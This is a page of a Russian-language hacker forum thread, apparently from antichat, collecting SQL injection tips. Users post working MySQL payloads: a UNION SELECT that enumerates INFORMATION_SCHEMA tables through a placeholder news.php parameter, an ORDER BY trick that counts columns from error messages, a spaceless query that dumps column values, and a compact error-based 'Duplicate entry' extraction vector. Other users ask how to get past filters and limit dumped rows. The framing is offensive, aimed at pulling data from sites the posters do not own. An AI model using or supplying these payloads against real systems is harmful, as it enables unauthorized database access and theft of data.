PDA

Просмотр полной версии : SQL injection полный FAQ

Страницы : 1 [2]
djkefir
10.04.2015, 21:41
Может есть софт который проверяет параметры страницы на инъекцию?

а то бывает что данные не выводятся, или ещё что-то такое.
reuvenmatbil
29.04.2015, 16:02
интересует вот что

INFORMATION_SCHEMA.TABLES открывается вот таким способом

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --

если кроме INFORMATION_SCHEMA на сайте есть

bd1

db2

как их открыть?
YaBtr
11.06.2015, 17:19
↑ (https://antichat.live/posts/3761126/)
Хочу добавить про подбор колонок в 1 запрос.
В случае если sqli выводит ошибки и пэйлоад вида

*+order+by+100+--+

выдаст нам ошибку

Query failed: Unknown column '100' in 'order clause'

То сразу смело вставляем такой пэйлоад

+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 ,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,6 7,68,69,70+--+

В ответ получим

Query failed: Unknown column '*' in 'order clause'

Где '*'-1='колличество наших колонок'.


/threads/43966/page-4#post-1227563 (https://antichat.live/threads/43966/page-4/)
psihoz26
11.06.2015, 18:22
↑ (https://antichat.live/posts/3857877/)
/threads/43966/page-4#post-1227563 (https://antichat.live/threads/43966/page-4/)


пардон не видел)
absolem
26.11.2015, 07:53
↑ (https://antichat.live/posts/3833704/)
И напоследок значения с колонок(без пробелов!)
SELECT(MID(CONCAT(@p:=0x20,(SELECT(COUNT(*))FROM({ TABLE})WHERE@p:=CONCAT(@p,0x0D0A,{COLUMN1},0x3a,{C OLUMN2})),@p),5))


Приветствую! А подскажите как правильно преобразоватть этот запрос с оператором LIMIT, что бы мне выводилось, к примеру, из COLUMN1,COLUMN2 только первые 5к записей, а не все сразу.
InSys
27.12.2015, 11:49
Если вдруг кому будет интересно, немного о том почему вообще работает метод вывода данных в тексте ошибки Duplicate entry '[data]' for key 'group_key'вынес в отдельную статью:

Error-Based SQL injection в MySQL (https://intsystem.org/security/error-based-sql-injection-in-mysql/#whyItWork)

И максимально сокращенный вектор этого метода выглядит теперь вот так:


SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2)x GROUP BY MID([YOUR_QUERY], FLOOR(RAND(33)*2), 64)
Coderast
27.09.2016, 00:43
Вопрос) Если в инъекции нельзя заюзать точку и тем самым не могу сделать например [...] SELECT * FROM INFORMATION_SCHEMA.TABLES [...] пробовал заюзать CHAR() но почему-то в названии таблицы не пашет